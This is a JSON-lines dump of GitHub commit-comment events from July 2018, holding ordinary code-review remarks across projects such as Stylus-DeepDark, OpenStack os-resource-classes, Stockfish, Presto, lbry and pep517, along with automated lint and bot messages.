{"id":"8000170744","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"RaitaroH/Stylus-DeepDark"},"payload":{"comment":{"id":29792363,"position":null,"line":null,"path":null,"commit_id":"9cd891c71218c98e43fec29187b2c6ecbcd3ecd7","created_at":"2018-07-22T12:50:44Z","updated_at":"2018-07-22T12:50:44Z","author_association":"COLLABORATOR","body":"Hi @tophf \r\n\r\nThanks for that comment. I cant see the issue you show on screenshot on FF 66.0.1 but anyway I agree it may be too broad.\r\n\r\nHow about this instead.\r\n\r\n```css\r\n\t#linter-label\r\n\t{\r\n\t\twhite-space: nowrap !important;\r\n\t}\r\n```"}},"created_at":"2018-07-22T12:50:44Z"}
{"id":"8000171084","type":"CommitCommentEvent","actor":{"login":"paulthebaker"},"repo":{"name":"stevertaylor/enterprise_extensions"},"payload":{"comment":{"id":29792364,"position":null,"line":null,"path":null,"commit_id":"489c4c5f6f32fbf83cb0dc30deebdd16b66dbaba","created_at":"2018-07-22T12:51:00Z","updated_at":"2018-07-22T12:51:00Z","author_association":"CONTRIBUTOR","body":"@stevertaylor can you fix this directly in master?  It'll be faster than me opening another PR."}},"created_at":"2018-07-22T12:51:00Z"}
{"id":"8000171392","type":"CommitCommentEvent","actor":{"login":"Rogerthat1991"},"repo":{"name":"Rogerthat1991/hello-world"},"payload":{"comment":{"id":29792366,"position":null,"line":null,"path":null,"commit_id":"d4742116cc3d4f1c3a45dc95e53f219186899461","created_at":"2018-07-22T12:51:13Z","updated_at":"2018-07-22T12:51:13Z","author_association":"OWNER","body":"Hi "}},"created_at":"2018-07-22T12:51:13Z"}
{"id":"8000171583","type":"CommitCommentEvent","actor":{"login":"2uasimojo"},"repo":{"name":"cdent/os-resource-classes"},"payload":{"comment":{"id":29792367,"position":26,"line":53,"path":"os_resource_classes/__init__.py","commit_id":"bd5d3eb786eed887f94ac7b93081c4f2d245e760","created_at":"2018-07-22T12:51:21Z","updated_at":"2018-07-22T12:51:21Z","author_association":"NONE","body":"> I'm guessing you're thinking \"well if people are creating resource {classes, traits} commonly from things in their environment it would be nice to be able to automate the translation of a set of words into the right structure\".\r\n\r\nExactly this. See for example https://review.openstack.org/#/c/579359/10/doc/source/specs/rocky/device-passthrough.rst@232\r\n\r\n> validate those choices against one thing only: the placement API.\r\n\r\nThis is a core issue where we differ. If the placement API is the only place I can go to even *ask* if my custom resource class name is valid (let alone programmatically create one from an arbitrary string), then it means two things: 1) I have to *go* to the placement API - i.e. make a REST call, which is slow(er than calling a local library method); and 2) If there's only validation, not normalization, then I have to wait until runtime, potentially in the field, to find out that I have a bug in my home-grown conversion function for some unanticipated input. If both placement and placement clients are using the same logic/method for normalization, the chances of such field escapes are drastically reduced.\r\n\r\n> differences in the way we think\r\n\r\nAgree. Overall a very good thing that creates lively discussion and results in better software."}},"created_at":"2018-07-22T12:51:21Z"}
{"id":"8000174160","type":"CommitCommentEvent","actor":{"login":"thanhbka"},"repo":{"name":"thanhbka/prime-project"},"payload":{"comment":{"id":29792372,"position":null,"line":null,"path":null,"commit_id":"fb937abb170fcf2f5bfafe8a004af737946f927a","created_at":"2018-07-22T12:53:22Z","updated_at":"2018-07-22T12:53:22Z","author_association":"OWNER","body":"ds"}},"created_at":"2018-07-22T12:53:22Z"}
{"id":"8000175193","type":"CommitCommentEvent","actor":{"login":"hellowillian21"},"repo":{"name":"EPsheep/duowanGallerySpider"},"payload":{"comment":{"id":29792379,"position":null,"line":null,"path":null,"commit_id":"adc90796d4102b5fbddb4faab87f51d2e8ea18e9","created_at":"2018-07-22T12:54:12Z","updated_at":"2018-07-22T12:54:12Z","author_association":"NONE","body":"`胡爷牛逼`"}},"created_at":"2018-07-22T12:54:12Z"}
{"id":"8000175787","type":"CommitCommentEvent","actor":{"login":"2uasimojo"},"repo":{"name":"cdent/os-resource-classes"},"payload":{"comment":{"id":29792381,"position":44,"line":44,"path":"os_resource_classes/__init__.py","commit_id":"e1094e23c3070e791f3f1a1f9837e1f7a42de862","created_at":"2018-07-22T12:54:41Z","updated_at":"2018-07-22T12:54:41Z","author_association":"NONE","body":"Actually I like that idea a lot. Like what we did for service-types-authority and os-service-types; resource-class-authority would have the yaml and os-resource-classes would be the thin shim that python consumers could import."}},"created_at":"2018-07-22T12:54:41Z"}
{"id":"8000177444","type":"CommitCommentEvent","actor":{"login":"radioactiveman"},"repo":{"name":"xfce-mirror/xfce4-panel"},"payload":{"comment":{"id":29792384,"position":null,"line":null,"path":null,"commit_id":"738032483f4501f3743a8cef3e169129b3e8c10c","created_at":"2018-07-22T12:55:58Z","updated_at":"2018-07-22T12:55:58Z","author_association":"NONE","body":"`g_find_program_in_path()` returns a newly-allocated string which should be freed."}},"created_at":"2018-07-22T12:55:58Z"}
{"id":"8000179058","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29792390,"position":null,"line":null,"path":null,"commit_id":"f5c32ee11e357d5c705c771163802466f82ff043","created_at":"2018-07-22T12:57:08Z","updated_at":"2018-07-22T12:57:08Z","author_association":"OWNER","body":"This test\r\n(weak & ~pos.pieces(Them, QUEEN)) (bench 4811651)\r\n(same as) (weak & ~pos.pieces(QUEEN)) (bench 4811651)\r\n\r\nis not the same as\r\n(weak ^ pos.pieces(Them, QUEEN)) (bench 5003895)\r\nwhich was tested here by @goodkov\r\nhttp://tests.stockfishchess.org/tests/view/5b53c9620ebc5902bdb81843\r\n\r\nbecause a^b = (a & ~b) | (b & ~a)\r\nso the goodkov version was keeping the \r\nweak \"non queens\" and the strongly protected queens."}},"created_at":"2018-07-22T12:57:08Z"}
{"id":"8000185910","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29792414,"position":null,"line":null,"path":null,"commit_id":"3928b6f0d1134a40f25d3202da516849a6513894","created_at":"2018-07-22T13:02:10Z","updated_at":"2018-07-22T13:02:10Z","author_association":"COLLABORATOR","body":"Puzzle `1016-094de400` disappeared from [`src/main/java/com/zerocracy/pm/in/Impediments.java`](https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/pm/in/Impediments.java), that's why I closed #1380. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-22T13:02:10Z"}
{"id":"8000186221","type":"CommitCommentEvent","actor":{"login":"chemfy"},"repo":{"name":"snipe/snipe-it"},"payload":{"comment":{"id":29792416,"position":5,"line":23,"path":"database/migrations/2016_12_27_212631_make_asset_assigned_to_polymorphic.php","commit_id":"9dc226e3d68a3373162e4972930587fcbe954b93","created_at":"2018-07-22T13:02:24Z","updated_at":"2018-07-22T13:02:24Z","author_association":"CONTRIBUTOR","body":"I made a fix to run the old command for mysql and without the orWhere for pgsql. I have made a pull request for it https://github.com/snipe/snipe-it/pull/5915"}},"created_at":"2018-07-22T13:02:24Z"}
{"id":"8000186818","type":"CommitCommentEvent","actor":{"login":"srihari2519"},"repo":{"name":"srihari2519/businessconfigserver"},"payload":{"comment":{"id":29792417,"position":null,"line":null,"path":null,"commit_id":"34508fec2ac596b8f1b4cfd48acde87d51ec3148","created_at":"2018-07-22T13:02:48Z","updated_at":"2018-07-22T13:02:48Z","author_association":"OWNER","body":"added data source uri"}},"created_at":"2018-07-22T13:02:48Z"}
{"id":"8000186938","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29792418,"position":null,"line":null,"path":null,"commit_id":"3928b6f0d1134a40f25d3202da516849a6513894","created_at":"2018-07-22T13:02:53Z","updated_at":"2018-07-22T13:02:53Z","author_association":"COLLABORATOR","body":"Puzzle `1380-39754ff8` discovered in   [`src/main/groovy/com/zerocracy/stk/pm/in/impediments/remove_impediment.groovy`](  https://github.com/zerocracy/farm/blob/master/src/main/groovy/com/zerocracy/stk/pm/in/impediments/remove_impediment.groovy)   and submitted as #1461. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-22T13:02:53Z"}
{"id":"8000186998","type":"CommitCommentEvent","actor":{"login":"dydzio0614"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":29792419,"position":30,"line":177,"path":"AI/VCAI/ResourceManager.cpp","commit_id":"e79478466dd23a05b319abd3caaee3d4554d3be2","created_at":"2018-07-22T13:02:57Z","updated_at":"2018-07-22T13:02:57Z","author_association":"MEMBER","body":"std::find_if is already part of C++ language, it probably can replace boost version for all use cases."}},"created_at":"2018-07-22T13:02:57Z"}
{"id":"8000189601","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"redaxo/redaxo"},"payload":{"comment":{"id":29792425,"position":13,"line":227,"path":"redaxo/src/core/lib/packages/package.php","commit_id":"26cc62a6e9fa3fc70c8c9681e371249fd00ade06","created_at":"2018-07-22T13:04:56Z","updated_at":"2018-07-22T13:04:56Z","author_association":"MEMBER","body":"wann kommt man hier oben in das file_exists() und wann braucht man den include darunter, ohne getPath()?"}},"created_at":"2018-07-22T13:04:56Z"}
{"id":"8000190087","type":"CommitCommentEvent","actor":{"login":"succcubbus"},"repo":{"name":"CleanstoneMC/Cleanstone"},"payload":{"comment":{"id":29792426,"position":4,"line":6,"path":"src/main/java/rocks/cleanstone/net/minecraft/protocol/v1_13/MinecraftProtocolLayer_v1_13.java","commit_id":"648b361ca73dd24568f88a42d0a922d33eb6558d","created_at":"2018-07-22T13:05:16Z","updated_at":"2018-07-22T13:05:16Z","author_association":"COLLABORATOR","body":"copy to v1_13 codec"}},"created_at":"2018-07-22T13:05:16Z"}
{"id":"8000191418","type":"CommitCommentEvent","actor":{"login":"NuLogicSystems"},"repo":{"name":"TheAssassin/AppImageLauncher"},"payload":{"comment":{"id":29792430,"position":null,"line":null,"path":null,"commit_id":"c3e1b274c65f7ecf31e784cf1664d007dd9ff1a1","created_at":"2018-07-22T13:06:19Z","updated_at":"2018-07-22T13:06:19Z","author_association":"NONE","body":"If there not coming from the source code then there coming from Manjaro/Arch.\r\nWe didn't set any CFLAGS in the PKGBUILD."}},"created_at":"2018-07-22T13:06:19Z"}
{"id":"8000191442","type":"CommitCommentEvent","actor":{"login":"pattacini"},"repo":{"name":"fbottarel/grasp-pose-gen"},"payload":{"comment":{"id":29792431,"position":null,"line":null,"path":null,"commit_id":"74ce150d663b21a20450439adbc42e4b11d83776","created_at":"2018-07-22T13:06:20Z","updated_at":"2018-07-22T13:06:20Z","author_association":"COLLABORATOR","body":"Since the check needs to be done against the unchanged pose candidates, the map we shall use is motor-to-vision, not vision-to-motor as per standard.\r\n\r\nThe map inversion is possible thanks to the latest modification to `iolReachingCalibration` (see http://robotology.github.io/iol/doxygen/doc/html/classiolReachingCalibration__IDL.html#a7f255b52ec5e2712bb868b0d3834e29b)."}},"created_at":"2018-07-22T13:06:20Z"}
{"id":"8000191491","type":"CommitCommentEvent","actor":{"login":"wlsgussla123"},"repo":{"name":"wlsgussla123/Algorithms"},"payload":{"comment":{"id":29792432,"position":null,"line":null,"path":null,"commit_id":"9ea43a3743a9db81a9f7a18eb7f3f7affc46fa39","created_at":"2018-07-22T13:06:24Z","updated_at":"2018-07-22T13:06:24Z","author_association":"OWNER","body":"@yonghyun123 ㅋㅋㅋㅋㅋㅋㅋㅋ 지금은 개발 스택 공부하는게 더 급하다..."}},"created_at":"2018-07-22T13:06:24Z"}
{"id":"8000192018","type":"CommitCommentEvent","actor":{"login":"atris"},"repo":{"name":"prestodb/presto"},"payload":{"comment":{"id":29792434,"position":18,"line":722,"path":"presto-main/src/main/java/com/facebook/presto/sql/planner/DomainTranslator.java","commit_id":"055496ef40a05c822fba40970a7ac9d7411842de","created_at":"2018-07-22T13:06:49Z","updated_at":"2018-07-22T13:06:49Z","author_association":"NONE","body":"Unnecessary else clause"}},"created_at":"2018-07-22T13:06:49Z"}
{"id":"8000192148","type":"CommitCommentEvent","actor":{"login":"sangsomjr"},"repo":{"name":"goodalls/refined-github-1"},"payload":{"comment":{"id":29792435,"position":null,"line":null,"path":null,"commit_id":"e54b08875367e792a69a9677d8c083bcf8fb356f","created_at":"2018-07-22T13:06:54Z","updated_at":"2018-07-22T13:06:54Z","author_association":"NONE","body":"Good"}},"created_at":"2018-07-22T13:06:54Z"}
{"id":"8000194291","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/nglview-feedstock"},"payload":{"comment":{"id":29792439,"position":null,"line":null,"path":null,"commit_id":"a0604b01546c2e721a5c9cb545b2a54536fa61fe","created_at":"2018-07-22T13:08:26Z","updated_at":"2018-07-22T13:08:26Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @hainm was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-22T13:08:26Z"}
{"id":"8000195356","type":"CommitCommentEvent","actor":{"login":"wlsgussla123"},"repo":{"name":"yonghyun123/NetworkProgramming"},"payload":{"comment":{"id":29792443,"position":null,"line":null,"path":null,"commit_id":"8349db15a0ac78eb611957305aa6c0266e00c82a","created_at":"2018-07-22T13:09:19Z","updated_at":"2018-07-22T13:09:19Z","author_association":"NONE","body":"이야... 거의 스윙스네"}},"created_at":"2018-07-22T13:09:19Z"}
{"id":"8000197022","type":"CommitCommentEvent","actor":{"login":"barankaplan7878"},"repo":{"name":"MrCrayfish/MrCrayfishFurnitureMod"},"payload":{"comment":{"id":29792446,"position":null,"line":null,"path":null,"commit_id":"dfe69d81c212f2c36817ddfc326a16283842d3ea","created_at":"2018-07-22T13:10:31Z","updated_at":"2018-07-22T13:10:31Z","author_association":"NONE","body":"So, what should I do?"}},"created_at":"2018-07-22T13:10:31Z"}
{"id":"8000197891","type":"CommitCommentEvent","actor":{"login":"atris"},"repo":{"name":"prestodb/presto"},"payload":{"comment":{"id":29792449,"position":16,"line":720,"path":"presto-main/src/main/java/com/facebook/presto/sql/planner/DomainTranslator.java","commit_id":"055496ef40a05c822fba40970a7ac9d7411842de","created_at":"2018-07-22T13:11:11Z","updated_at":"2018-07-22T13:11:11Z","author_association":"NONE","body":"Is this correct? If the current node is not something we can support, in the current form  we will delegate to the parent to deal with the node. However, with canProcessExpression's semantics, we will do a search right till the first SymbolReference is seen. Should we not return back as soon as the first non supported node is seen?"}},"created_at":"2018-07-22T13:11:11Z"}
{"id":"8000200767","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29792450,"position":9,"line":207,"path":"pkgs/stdenv/generic/setup.sh","commit_id":"94d164dd7f20c785a543d1fb1d5bd359fb38bd25","created_at":"2018-07-22T13:13:29Z","updated_at":"2018-07-22T13:13:29Z","author_association":"MEMBER","body":"For reference, removed since 739c8355150."}},"created_at":"2018-07-22T13:13:29Z"}
{"id":"8000204714","type":"CommitCommentEvent","actor":{"login":"tophf"},"repo":{"name":"RaitaroH/Stylus-DeepDark"},"payload":{"comment":{"id":29792458,"position":null,"line":null,"path":null,"commit_id":"9cd891c71218c98e43fec29187b2c6ecbcd3ecd7","created_at":"2018-07-22T13:16:31Z","updated_at":"2018-07-22T13:16:31Z","author_association":"NONE","body":"It's in the not-yet-released Stylus 1.4.16, you can test it by loading manifest.json from our github repo on about:debugging page in FF."}},"created_at":"2018-07-22T13:16:31Z"}
{"id":"8000206175","type":"CommitCommentEvent","actor":{"login":"haochenprophet"},"repo":{"name":"openbmc/openbmc"},"payload":{"comment":{"id":29792459,"position":null,"line":null,"path":null,"commit_id":"aad617f2cef143937204e78ee7b10da5d197420b","created_at":"2018-07-22T13:17:36Z","updated_at":"2018-07-22T13:17:36Z","author_association":"NONE","body":"The openbmc  is the future of the server bmc project."}},"created_at":"2018-07-22T13:17:36Z"}
{"id":"8000206637","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":29792460,"position":null,"line":null,"path":null,"commit_id":"fd763231441492a0f900e8c9227b3b2dd1ee321c","created_at":"2018-07-22T13:18:00Z","updated_at":"2018-07-22T13:18:00Z","author_association":"OWNER","body":"I didn't test it to see if GPS works or not. But no crash. This commit just binderize the hal."}},"created_at":"2018-07-22T13:18:00Z"}
{"id":"8000206638","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29792461,"position":null,"line":null,"path":null,"commit_id":"6117b99c813e4c577a7e73b8ceb849f30eab1036","created_at":"2018-07-22T13:18:00Z","updated_at":"2018-07-22T13:18:00Z","author_association":"OWNER","body":"### ------------------------------- Detekt Issues ☠️ -------------------------------\n- [LongParameterList - 9/7 - [myFunc]](https://github.com/tarek360/emptyapp/blob/6117b99c813e4c577a7e73b8ceb849f30eab1036/KotlinPresenter.kt#L18)\n- [EmptyIfBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/6117b99c813e4c577a7e73b8ceb849f30eab1036/KotlinPresenter.kt#L20)\n- [EmptyIfBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/6117b99c813e4c577a7e73b8ceb849f30eab1036/KotlinPresenter.kt#L22)\n- [EmptyIfBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/6117b99c813e4c577a7e73b8ceb849f30eab1036/KotlinPresenter.kt#L26)\n- [EmptyElseBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/6117b99c813e4c577a7e73b8ceb849f30eab1036/KotlinPresenter.kt#L28)\n- [EmptyWhenBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/6117b99c813e4c577a7e73b8ceb849f30eab1036/KotlinPresenter.kt#L33)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/6117b99c813e4c577a7e73b8ceb849f30eab1036/Factory.kt#L9)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/6117b99c813e4c577a7e73b8ceb849f30eab1036/Factory.kt#L11)\n- [MagicNumber - [num]](https://github.com/tarek360/emptyapp/blob/6117b99c813e4c577a7e73b8ceb849f30eab1036/KotlinPresenter.kt#L16)\n- [MagicNumber - [myFunc]](https://github.com/tarek360/emptyapp/blob/6117b99c813e4c577a7e73b8ceb849f30eab1036/KotlinPresenter.kt#L22)\n- [MagicNumber - [myFunc]](https://github.com/tarek360/emptyapp/blob/6117b99c813e4c577a7e73b8ceb849f30eab1036/KotlinPresenter.kt#L26)\n- [MagicNumber - [myFunc]](https://github.com/tarek360/emptyapp/blob/6117b99c813e4c577a7e73b8ceb849f30eab1036/KotlinPresenter.kt#L38)\n- [MagicNumber - [createPresenter]](https://github.com/tarek360/emptyapp/blob/6117b99c813e4c577a7e73b8ceb849f30eab1036/Factory.kt#L11)\n"}},"created_at":"2018-07-22T13:18:00Z"}
{"id":"8000207098","type":"CommitCommentEvent","actor":{"login":"tomasherceg"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29792462,"position":null,"line":null,"path":null,"commit_id":"085841fd233c7d1f10c11ced7244401a68df4f8c","created_at":"2018-07-22T13:18:15Z","updated_at":"2018-07-22T13:18:15Z","author_association":"CONTRIBUTOR","body":"Revert this. We'll make this obsolete **AFTER** we have an alternative solution. Not before."}},"created_at":"2018-07-22T13:18:15Z"}
{"id":"8000207390","type":"CommitCommentEvent","actor":{"login":"jeremiahjstacey"},"repo":{"name":"jeremiahjstacey/esapi-java-legacy-dev"},"payload":{"comment":{"id":29792465,"position":36,"line":36,"path":"src/main/java/org/owasp/esapi/logging/slf4j/Slf4JLogFactory.java","commit_id":"938b8c8b78892d6b93ef911cc809df7fa1949dbc","created_at":"2018-07-22T13:18:25Z","updated_at":"2018-07-22T13:18:25Z","author_association":"OWNER","body":"Haste work.  Everything maps to TRACE.  oops"}},"created_at":"2018-07-22T13:18:25Z"}
{"id":"8000208924","type":"CommitCommentEvent","actor":{"login":"pradyunsg"},"repo":{"name":"pypa/pep517"},"payload":{"comment":{"id":29792468,"position":13,"line":121,"path":"pep517/wrappers.py","commit_id":"6261bd944d6c414b6b37b92c1a414bf15bee0ed7","created_at":"2018-07-22T13:19:36Z","updated_at":"2018-07-22T13:19:36Z","author_association":"MEMBER","body":"Should this be encoded early -- when `build_backend` is set?"}},"created_at":"2018-07-22T13:19:36Z"}
{"id":"8000209630","type":"CommitCommentEvent","actor":{"login":"gwww"},"repo":{"name":"ciotlosm/custom-lovelace"},"payload":{"comment":{"id":29792469,"position":null,"line":null,"path":null,"commit_id":"811407db06a9c9f3d8540d56254ea61ed623d7e1","created_at":"2018-07-22T13:20:08Z","updated_at":"2018-07-22T13:20:08Z","author_association":"NONE","body":"The enable/disable doesn't work when typing in the input field. When backspace to zero chars it should disable.\r\n\r\nThe reason I removed that code is from a UX perspective enable/disable didn't really make the experience any better. And, in modelling a keypad (such as on a physical alarm panel keypad), it doesn't enable/disable the button.\r\n\r\nBut the code is there :)"}},"created_at":"2018-07-22T13:20:08Z"}
{"id":"8000222708","type":"CommitCommentEvent","actor":{"login":"eukreign"},"repo":{"name":"lbryio/lbry"},"payload":{"comment":{"id":29792515,"position":10,"line":37,"path":"lbrynet/undecorated.py","commit_id":"fea1deb76d9cee6774fbe0a4b45c12bb787eef8f","created_at":"2018-07-22T13:29:37Z","updated_at":"2018-07-22T13:29:37Z","author_association":"MEMBER","body":"comment is not necessary anymore since we're py3 only"}},"created_at":"2018-07-22T13:29:37Z"}
{"id":"8000222859","type":"CommitCommentEvent","actor":{"login":"GitBruno"},"repo":{"name":"ExtendScript/extendscriptr"},"payload":{"comment":{"id":29792517,"position":14,"line":45,"path":"package.json","commit_id":"34ae35f6ae14a704668e04d64002e1f9ec8d54ee","created_at":"2018-07-22T13:29:43Z","updated_at":"2018-07-22T13:29:43Z","author_association":"MEMBER","body":"I can't remember what my testing environment was. It seems to install and work fine without it. "}},"created_at":"2018-07-22T13:29:43Z"}
{"id":"8000224026","type":"CommitCommentEvent","actor":{"login":"takluyver"},"repo":{"name":"pypa/pep517"},"payload":{"comment":{"id":29792523,"position":13,"line":121,"path":"pep517/wrappers.py","commit_id":"6261bd944d6c414b6b37b92c1a414bf15bee0ed7","created_at":"2018-07-22T13:30:26Z","updated_at":"2018-07-22T13:30:26Z","author_association":"MEMBER","body":"Encoding late makes sense to me, but I don't feel strongly about it.\n\nOn Sun, 22 Jul 2018, 3:19 p.m. Pradyun Gedam, <notifications@github.com>\nwrote:\n\n> Should this be encoded early -- when build_backend is set?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/pypa/pep517/commit/6261bd944d6c414b6b37b92c1a414bf15bee0ed7#commitcomment-29792468>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAUA9UAF6Z7NmFZ82GOskNuF7PnmG3Iaks5uJHvogaJpZM4VZ_iM>\n> .\n>\n"}},"created_at":"2018-07-22T13:30:26Z"}
{"id":"8000224311","type":"CommitCommentEvent","actor":{"login":"paulio84"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29792525,"position":19,"line":19,"path":"Vidly/Controllers/CustomersController.cs","commit_id":"b727a26e1b4b88abe84a8b48208fec537db2ed43","created_at":"2018-07-22T13:30:36Z","updated_at":"2018-07-22T13:30:36Z","author_association":"NONE","body":"It could be that you are missing a reference to the System.Linq library.  I had to add using System.Linq; to the top of the file."}},"created_at":"2018-07-22T13:30:36Z"}
{"id":"8000224979","type":"CommitCommentEvent","actor":{"login":"hackrush01"},"repo":{"name":"lbryio/lbry"},"payload":{"comment":{"id":29792526,"position":10,"line":37,"path":"lbrynet/undecorated.py","commit_id":"fea1deb76d9cee6774fbe0a4b45c12bb787eef8f","created_at":"2018-07-22T13:31:03Z","updated_at":"2018-07-22T13:31:03Z","author_association":"MEMBER","body":"We are using someone else's library\r\nhttps://github.com/mapleoin/undecorated/blob/master/undecorated.py#L35"}},"created_at":"2018-07-22T13:31:03Z"}
{"id":"8000225257","type":"CommitCommentEvent","actor":{"login":"hackrush01"},"repo":{"name":"lbryio/lbry"},"payload":{"comment":{"id":29792527,"position":10,"line":37,"path":"lbrynet/undecorated.py","commit_id":"fea1deb76d9cee6774fbe0a4b45c12bb787eef8f","created_at":"2018-07-22T13:31:14Z","updated_at":"2018-07-22T13:31:14Z","author_association":"MEMBER","body":"Do you still want me to remove it?"}},"created_at":"2018-07-22T13:31:14Z"}
{"id":"8000225589","type":"CommitCommentEvent","actor":{"login":"fupenghui11"},"repo":{"name":"fupenghui11/mm.yml"},"payload":{"comment":{"id":29792528,"position":1,"line":1,"path":".gitignore/.gitignore","commit_id":"3ddd68067c7786430abf48b3882e49ac3dfa8b59","created_at":"2018-07-22T13:31:28Z","updated_at":"2018-07-22T13:31:28Z","author_association":"OWNER","body":"xxx"}},"created_at":"2018-07-22T13:31:28Z"}
{"id":"8000226164","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29792529,"position":null,"line":null,"path":null,"commit_id":"9d45e83c1ae99a4583e972bf007ac67bcb3c6a97","created_at":"2018-07-22T13:31:51Z","updated_at":"2018-07-22T13:31:51Z","author_association":"OWNER","body":"### ------------------------------- Detekt Issues ☠️ -------------------------------\n- [LongParameterList - 9/7 - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L18)\n- [EmptyIfBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L20)\n- [EmptyIfBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L22)\n- [EmptyIfBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L26)\n- [EmptyElseBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L28)\n- [EmptyWhenBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L33)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/Factory.kt#L9)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/Factory.kt#L11)\n- [MagicNumber - [num]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L16)\n- [MagicNumber - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L22)\n- [MagicNumber - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L26)\n- [MagicNumber - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L38)\n- [MagicNumber - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/Factory.kt#L11)\n"}},"created_at":"2018-07-22T13:31:51Z"}
{"id":"8000226393","type":"CommitCommentEvent","actor":{"login":"hackrush01"},"repo":{"name":"lbryio/lbry"},"payload":{"comment":{"id":29792530,"position":1,"line":1,"path":"lbrynet/daemon/auth/server.py","commit_id":"fea1deb76d9cee6774fbe0a4b45c12bb787eef8f","created_at":"2018-07-22T13:32:00Z","updated_at":"2018-07-22T13:32:00Z","author_association":"MEMBER","body":"@eukreign, earlier this file was not covered by pylint. Do you want to keep it that way?"}},"created_at":"2018-07-22T13:32:00Z"}
{"id":"8000226428","type":"CommitCommentEvent","actor":{"login":"eukreign"},"repo":{"name":"lbryio/lbry"},"payload":{"comment":{"id":29792531,"position":5,"line":33,"path":"lbrynet/daemon/DaemonServer.py","commit_id":"fea1deb76d9cee6774fbe0a4b45c12bb787eef8f","created_at":"2018-07-22T13:32:01Z","updated_at":"2018-07-22T13:32:01Z","author_association":"MEMBER","body":"I don't think it makes sense for this to be bytes. Can you fix the underlying issue instead preventing this from being a unicode `str`?"}},"created_at":"2018-07-22T13:32:01Z"}
{"id":"8000227427","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"RaitaroH/Stylus-DeepDark"},"payload":{"comment":{"id":29792532,"position":null,"line":null,"path":null,"commit_id":"9cd891c71218c98e43fec29187b2c6ecbcd3ecd7","created_at":"2018-07-22T13:32:43Z","updated_at":"2018-07-22T13:32:43Z","author_association":"COLLABORATOR","body":":) OK well I just wanted to make sure you didnt see an issue with that linterlabel set with no wrap before I merged it :)"}},"created_at":"2018-07-22T13:32:43Z"}
